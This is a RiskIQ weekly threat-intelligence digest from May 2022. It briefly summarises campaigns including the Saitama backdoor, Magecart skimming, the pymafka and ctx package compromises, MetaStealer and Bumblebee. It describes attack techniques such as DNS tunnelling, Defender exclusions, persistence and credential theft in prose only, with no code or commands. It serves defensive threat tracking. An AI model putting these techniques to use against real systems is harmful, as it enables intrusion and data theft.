Risk IQ Updates May 30, 2022



PassiveTotal Threat Intel Digest


This digest highlights OSINT and original research that RiskIQ has gathered and enriched weekly.


RiskIQ: EUROPIUM uses Saitama backdoor, targets Jordan Government

EUROPIUM, an Iranian APT also referred to as APT34 and OilRig, have actively been targeting Jordan’s Foreign Ministry with a document-themed phishing campaign. The campaign is distributing a malicious Excel file and uses the Saitama backdoor, a new tool not previously seen in use by EUROPIUM.

RiskIQ Backdoor Saitama APT APT34 EUROPIUM OilRig Iran Jordan

12 Indicators      8 Public      4 RiskIQ


RiskIQ: Magecart Injected URLs and C2 Domains, May 20-27, 2022

Between 20 and 27 May 2022, RiskIQ detected 299 Magecart and skimmer injected URLs, and detected 76 unique C2 domains used by known Magecart threat actors. Note that many of these URLs are legitimate, compromised websites. The full URL should be considered and the domain itself is not necessarily malicious. Also, note that some C2 domains may be compromised, legitimate domains when establishing current maliciousness. See RiskIQ's most recent reporting on Magecart in the references.

RiskIQ MageCart Skimmer JavaScript

375 Indicators      0 Public      375 RiskIQ


Grandoreiro Banking Malware Resurfaces

Trustwave SpiderLabs in early April observed a Grandoreiro malware campaign targeting bank users from Brazil, Spain, and Mexico. The campaign exploits the tax season in target countries by sending out tax-themed phishing emails.

TrustWave Malware Grandoreiro DllHijacking Phishing

9 Indicators      9 Public     


RiskIQ: Files with Image Extensions Hosted on Discord's CDN Drop Smoke Loader

RiskIQ reviewed malicious files that were hosted on Discord's Content Delivery Network that ended in various image file extensions (.jpeg, .jpg, .bmp, .png, and .gif). We keyed in on a few samples that used URL shortening services to forward to the Discord URL hosting the image file. One set of activity noted was five different image files that all loaded up the same executable which was identified as Smoke Loader. No detailed analysis has been conducted on the Smoke Loader file, but it is noted that according to the Hybrid Analysis Sandbox, the Smoke Loader file reads terminal service related keys: "TSUSERENABLED" and "TSAPPCOMPAT". The file was also packed with "Safeguard v1.03 -> Simonzh".

RiskIQ Malware SmokeLoader

35 Indicators      35 Public     


RiskIQ: GootKit Payload Delivery URLs, May 25, 2022

Between 18 May 2022 - 24 May 2022, RiskIQ detected five fake forum pages containing a link to the GootKit payload delivery URL. Note that these are legitimate compromised websites, so the full URL should be considered and the domain itself is not necessarily malicious.

RiskIQ GootKit

10 Indicators      10 Public     


Python Package ‘pykafka’ TypoSquatting Attack Targets macOS & Linux

Researchers from Sonatype reported on a supply chain attack via a malicious Python package ‘pymafka’ that was uploaded to the popular PyPI registry. The package attempted to infect users by means of typosquatting: hoping that victims looking for the legitimate ‘pykafka’ package might mistype the query and download the malware instead. Depending on whether you are running Windows, macOS, or Linux, an appropriate malicious trojan is downloaded and executed on the infected system. The trojan in dropped in this attack is a Cobalt Strike (CS) beacon.

macOS SupplyChain TypoSquatting CobaltStrike Linux Python Sonatype SentinelOne

9 Indicators      9 Public     


Saitama backdoor and DNS tunnelling

Malware with the intent of surveillance or espionage needs to operate undetected, but the chances are it also needs to exfiltrate data or exchange messages with its command and control infrastructure, both of which could reveal its presence to threat hunters. Saitama avoids detection by using DNS Tunnelling, which hides messages inside ordinary-looking DNS requests. This article expands on the tricks that Saitama used to keep its DNS tunelling hidden.

DNS-Tunneling Malware APT34 Malwarebytes

5 Indicators      5 Public     


Unknown APT Group Targets Russia with Phishing Campaigns

Since February, an unknown APT group has launched at least four spear campaigns against Russian targets using a variety of lures. Attribution is difficult, and threat actors are known to use indicators from other groups as false flags. The attribution of the APT behind these campaigns is ongoing, but based on the infrastructure used, Malwarebytes assess with low confidence that this group is a Chinese actor. In the below article, the Malwarebytes researchers reveal the tactics and techniques used by the threat actors and provide a technical analysis of the observed malicious stages and payloads.

Phishing NewAPT Spoofing Russia Ukraine TypoSquatting

56 Indicators      56 Public     


ctx Python Library Updated with "Extra" Features

Python Package ctx was compromised May 14th, 2022. Last uploaded to pypi.org on December 19, 2014, recent version updates that seemed identical raised some red flags for Reddit user u/jimtk. A check on ctx author’s GitHub repository showed that the ctx package should not have received any recent updates. In the “new” ctx 0.1.2.py version, there was code added to attempt to retrieve the AWS access key ID, computer name and the AWS secret access key when a dictionary is created. Further compromised versions attempted to obtain all environment variables, encode them in Base64, and forward the data to a web app under the perpetrator’s control. PHP's phpass also saw similar version updates containing the same type of malicious code. The compromise of hautepass/phpass has been attributed to the attacker claiming a previously abandoned GitHub repository and reviving that repository to publish altered 'phpass' versions to the Packagist registry. Given the malware was injected about a week ago, only the users who installed them in the past week have been affected. Malicious versions to date: - The “new” ctx version 0.1.2 as of May 14th, 2022 - ctx version 0.2.2 - ctx version 0.2.6 - php library phpass as of May 14th, 2022

ctx PyPi Python PHP phpass CodeInjection

4 Indicators      4 Public     


New Nokoyawa Ransomware Variant with Blatant Code Reuse

FortiGuardLabs discovered a new variant of the Nokoyawa ransomware and observed it reusing code from publicly available sources. Unlike its alleged ransomware predecessor, Karma, FortiGuard Labs has only observed samples of Nokoyawa compiled to run on 64-bit Windows.

Ransomware Nokoyawa CobaltStrike

19 Indicators      19 Public     


GuLoader Dropped in New 'Energy Market' Themed Phishing Campaign

Given the current fluctuations in the energy market and the related rise in prices to consumers, it should be no surprise that threat actors are using lures to exploit the global interest in this issue. FortiGuard Labs recently discovered an e-mail using this tactic. The message was delivered to a coffee company in Ukraine that was seemingly sent by an oil provider in Saudi Arabia. Purporting to be a purchase order, the partial PDF file image displayed in the body of the email was actually a link to an ISO file hosted in the cloud that contained an executable for GuLoader. Also known as CloudEye and vbdropper, GuLoader dates to at least 2019 and is generally used to deploy other malware variants, such as Agent Tesla, Formbook, and Lokibot.

phishing GuLoader

4 Indicators      4 Public     


Metastealer New Information Stealer Variant

MetaStealer is a new information stealer variant designed to fill the void following Racoon stealer suspending operations in March of this year. Israeli intelligence firm, Kela, first identified its emergence on underground marketplaces. Significant findings include: - Heavy reliance on open-source libraries - Microsoft Defender Bypass - Scheduled Task Persistence - Password Stealer - Keylogger - Hidden VNC server Currently seen distributed via phishing as Excel attachments. Early on in execution, a PowerShell command adds an exclusion rule to Microsoft Defender, effectively turning off scanning of files with ‘.exe’ extension. This decreases the chances of the main payload being detected as well as any subsequent payloads that may be delivered to the target host post infection. To maintain persistence, a scheduled task is created to trigger at user login, ensuring the malware remains across reboots.

MetaStealer Keylogger PowerShell Malware PasswordStealer Phishing Macros Excel

21 Indicators      19 Public      2 RiskIQ


Bumblebee Malware from TransferXL URLs

Last month, Google's Threat Analysis Group (TAG) reported on EXOTIC LILY using file transfer services like TransferNow, TransferXL, WeTransfer, or OneDrive to distribute malware. [Read More Here.](https://community.riskiq.com/article/41e23799/description) Using this information, Duncan found a handful of active TransferXL URLs delivering ISO files for Bumblebee malware.

Bumblebee Malware EXOTICLILY CobaltStrike FileSharing

16 Indicators      16 Public     

RiskIQ | 22 Battery Street, 10th Floor | San Francisco, CA 94111
© Copyright 2022 RiskIQ, Inc. All rights reserved.